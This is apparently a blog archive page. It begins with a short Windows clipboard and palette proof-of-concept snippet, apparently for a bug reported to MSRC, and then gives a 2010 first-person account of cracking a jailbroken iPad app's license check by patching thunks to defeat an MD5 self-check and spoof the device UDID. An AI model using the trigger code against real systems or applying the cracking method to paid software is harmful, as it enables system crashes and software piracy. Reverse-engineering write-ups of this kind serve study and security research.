DEVMODE dm = {0};
dm.dmSize  = sizeof(DEVMODE);
dm.dmBitsPerPel = 8;
dm.dmPelsWidth = 800;
dm.dmPelsHeight = 600;
dm.dmFields = DM_PELSWIDTH | DM_PELSHEIGHT | DM_BITSPERPEL;
ChangeDisplaySettings(&dm, 0);

BITMAPINFOHEADER bmih = {0};
bmih.biClrUsed = 0x200;

HGLOBAL h = GlobalAlloc(GMEM_FIXED, 0x1000);
memcpy((PVOID)GlobalLock(h), &bmih, sizeof(bmih));
GlobalUnlock(h);

OpenClipboard(NULL);
SetClipboardData(CF_DIBV5, (HANDLE)h);
CloseClipboard();

OpenClipboard(NULL);
GetClipboardData(CF_PALETTE);


[Update, 11th Aug]: Here is MSRC response.

Cracking for Fun and Non-Profit

Saturday, May 22nd, 2010

One of the fun things to do with applications is to bypass their copy-protection mechanisms. So I want to share my experience with some iPad application, though the application is targeted at jailbroken devices. It all began a few days ago, when a friend challenged me to crack some application. I had my motives, and I’m not going to talk about them. However, that’s why the title says non-profit. Or maybe when they always say “for profit” they mean the technical-knowledge profit.

So before you start to crack an application, you should see how it works: what happens when you run it, and what GUI-related stuff you can see, like dialog boxes or messages that pop up upon some event you fire. There are so many techniques for approaching application cracking, but I’m not here to write a tutorial, just to talk a bit about what I did.

So I fired up IDA with the app loaded. The app was quite small, around 35 KB. The first thing I did was look at the imported functions; this is how I know at a glance what I’m going to fight with. I saw MD5/RSA imported from the crypto library, and that was like “uh oh”, but no drama. Thing is, my friend purchased the app and gave me the license file. Obviously it’s easier with a license file. Sometimes it turns out to be impossible to crack software without critical info that is encrypted in the license file, and that was the issue in my case too. Of course, there’s no point in a license file that is only used to check the serial number or something like that, because it’s not enough. So without the license file, there wasn’t much to do.

For some reason IDA didn’t parse the app well, so I had to recall how to use the ugly API of IDC (the internal scripting language of IDA). Yes, I know IDAPython, but I didn’t want to use it. My script fixed all the LDR instructions, because the code is PICy, so with the strings revealed I could easily follow all those ugly objc_msgSend calls. To Apple’s credit, the messages are text based, so it’s easy to understand what’s going on once you manage to get to that string. Performance-wise, though, this is so lame; I’d rather use integers than strings, c’mon.

Luckily the developer of that app didn’t bother to hide the exported list of functions; he was busy with a pure protection algorithm in Objective-C, good for me.
So eventually the way the app worked (from the license perspective) was to check whether the license file exists and, if so, parse it. Otherwise, it asks for permission to connect to the Internet, sends the UDID (unique device ID) of the device to the app’s server and gets a response; if the status code is success, it writes the response to a file and then runs the license validator again.

The license validator was quite cool. It called dladdr on itself to get the full path of the executable, then calculated the MD5 of the binary. Can you see why? So if you thought you could easily tamper with the file, you were wrong. It took the MD5 hash and xored it in some pattern with the data from the license file, then decrypted the result with the public key that was in the static segment, though I didn’t care much about that. Making the decryption depend on the MD5 of the binary itself is a very clever trick by the developer, though an expected one. So I tried to learn more about how the protection works.
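
To make that dependency concrete, here is a minimal sketch in C of the xor step only, under stated assumptions. The app xored the hash with the license data “in some pattern” that I’m not spelling out, so repeating the 16-byte digest cyclically is just a guess for illustration, and xor_with_digest is a hypothetical name, not something taken from the app. The RSA step is left out.

```c
#include <stddef.h>
#include <stdint.h>

#define DIGEST_LEN 16 /* an MD5 digest is 16 bytes */

/* Hypothetical helper: xor the license bytes in place with the digest of
 * the binary. Repeating the digest cyclically is an assumption; the real
 * pattern used by the app is not described here. */
void xor_with_digest(uint8_t *license, size_t len,
                     const uint8_t digest[DIGEST_LEN])
{
    for (size_t i = 0; i < len; i++)
        license[i] ^= digest[i % DIGEST_LEN];
}
```

Since xor is its own inverse, running this twice with the same digest restores the buffer, while a digest computed over a tampered binary leaves garbage for the next step.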

Supposing the license was legit, the app would take that buffer and strtok() it into tokens, to check that the UDID was correct. The developer was nice enough to call the lockdownd APIs directly, so in one second I knew where and what was going on around it. In the beginning I wanted to create a proxy dylib for this lockdownd library, but that would require patching the Mach-O header so that the imported function resolves through my new file, and that is still a change to the file, no good. So the way it worked with the decrypted string: it kept on tokenizing the string, but this time it checked for some string match, because if someone had tampered with the binary, the decryption would go wrong and the string wouldn’t compare well. And then it did some manipulation on some object, adding methods to it at runtime, with the names from the tokenized string. Thus if you don’t have a license file to begin with, you don’t know the names of the new methods that were added. One star for the developer, yippee.
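
The tokenizing part can be sketched roughly like this in C. Everything specific here is an assumption for illustration: the ';' delimiter, the UDID being the first token, the remaining tokens being the method names, and the parse_license name itself. The extra string-match check and the runtime method registration are not shown.

```c
#include <string.h>

#define LICENSE_DELIMS ";" /* assumed delimiter, not the app's real one */

/* Hypothetical sketch: tokenize a decrypted license buffer in place.
 * Returns -1 if the first token is not the device UDID; otherwise stores
 * up to max_names of the following tokens in names[] and returns how
 * many were stored. */
int parse_license(char *decrypted, const char *device_udid,
                  const char *names[], int max_names)
{
    char *tok = strtok(decrypted, LICENSE_DELIMS);
    if (tok == NULL || strcmp(tok, device_udid) != 0)
        return -1;

    int count = 0;
    while (count < max_names &&
           (tok = strtok(NULL, LICENSE_DELIMS)) != NULL)
        names[count++] = tok;
    return count;
}
```

Note that strtok() writes terminators into the buffer, so names[] ends up pointing into the decrypted license itself. If the decryption went wrong, the first comparison already fails and no names come out.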

All in all, I have to say that I wasn’t using any debugger or runtime tricks; everything was static reversing, yikes. Therefore, once I was convinced that I couldn’t ignore the protection, because I lacked the names of the new methods and couldn’t use a debugger to fish them out easily, I was left with one solution, as I said before: faking the UDID and fixing the MD5.

What I really cared about for a start was how the app calculates the MD5 of itself:
Since the developer retrieved the name of the binary using dladdr, I couldn’t just change some path to point to the original copy of the binary so that hashing it would give the expected hash. That was a bummer. I had to do something else, but with a similar idea… I decided to patch the file-open function. The library functions are called in ARM mode and it’s very clear. The app itself was in THUMB, so it transitions to ARM using a BX instruction and calls a thunk, which in turn calls the imported function. So the thunk function is in ARM mode, thus 4 bytes per instruction, very wasteful IMHO.

The goal of my patches was to patch those thunks rather than all the callers of those thunks, because otherwise I could end up with a dozen different places to patch. So in a way I was limited in the patches I could do. Eventually I extended the thunk of the file-open and made the R0 register point to a path I controlled, where I could guarantee an original copy of the binary, so when the app calculated the MD5 of it, it would be the expected hash. Again, I could have done so many other things, like planting a new MD5 value in the binary and copying it in the MD5-Final API call, but that required too many code changes. And oh yes, I’m such a jackass that I didn’t even use an ARM assembler. Pfft, hex-editing FTW :( Oh, I also have to comment that it was safe to patch the thunk of file-open, because all the callers were related to the MD5 hashing…

OK, so now I got the MD5 right and I could patch the file however I saw fit. Patching the UDID strcmp’s wasn’t enough, since the license wasn’t a “yes/no” check; it had essential data I needed. Otherwise I could have finished with the protection in a 1-minute patch (without going through the MD5 hassle). So I didn’t even touch those strcmp’s.

RSA encryption then? Ahhh, not so fast. The developer was decrypting the xored license with the resulting MD5 hash, then comparing the UDID. So I got the license decrypted well with the MD5 patch, but now the UDID returned from lockdownd was wrong, because it didn’t correspond to the purchased license. So I had to change it as well. The problem with that UDID and the lockdownd API is that it returns a CFSTR, so I had to wrap my string in that annoying structure. That done, I patched the thunk of the lockdown API to simply return my CFSTR of the needed UDID string.

And guess what?? It crashed :) I put my extra code in a __ustring segment, and in the beginning I thought the segment wasn’t executable, because it’s data. But I tried to run something very basic that would work for sure, and it did, so I understood the problem was with my patch and had to double-check it. Then I found out that I was piggy-backing on the wrong (existing) CFSTR, because I had changed its type. Probably some code that was using the patched CFSTR was expecting a different type and therefore crashed, so I piggy-backed on a different CFSTR that wouldn’t harm the application and was of a similar type to what I needed (just a string, 0x7c8). What don’t we do when we don’t have segment slack for our patch code. :)
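
For reference, this is roughly what that annoying structure looks like when written out in C. It is a sketch of the constant-string layout as I understand Apple’s compilers to emit it (a class pointer, a flags word, the character pointer and the length); the struct, field and function names are made up for illustration, and the exact layout should be treated as an assumption rather than a spec. The 0x7c8 value is the “just a string” type mentioned above.

```c
#include <stdint.h>
#include <string.h>

#define CFSTR_FLAGS_PLAIN 0x7c8u /* the "just a string" type from above */

/* Assumed layout of a compile-time constant CFString; names are made up. */
struct const_cfstring {
    const void *isa;    /* class reference shared by constant strings */
    uint32_t    flags;  /* string type, e.g. 0x7c8 */
    const char *data;   /* the characters */
    long        length; /* character count, without the terminator */
};

/* Hypothetical helper: build a fake constant string for a UDID by
 * borrowing the class pointer from an existing (donor) constant string. */
void make_fake_cfstring(struct const_cfstring *out,
                        const struct const_cfstring *donor,
                        const char *udid)
{
    out->isa    = donor->isa;
    out->flags  = CFSTR_FLAGS_PLAIN;
    out->data   = udid;
    out->length = (long)strlen(udid);
}
```

In the actual patch there was no helper function of course, just bytes typed in with a hex editor over an existing CFSTR, which is exactly why picking a donor of the wrong type bites.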

And then it worked… how surprising, NOT. But it required lots of trial and error, mind you, mostly because of the lack of tools.
End of story.
It’s really hard to say how I would design it better. When I had my chance, I was crazy about obfuscation, to make the reverser desperate, so he can’t see a single API call, no strings, nothing. Plant decoy strings, code and functionality, so he wastes more time. It’s always possible to bypass the protections anyway: if the CPU can do it, I can do it too, right? (As long as I’m on the same ring.)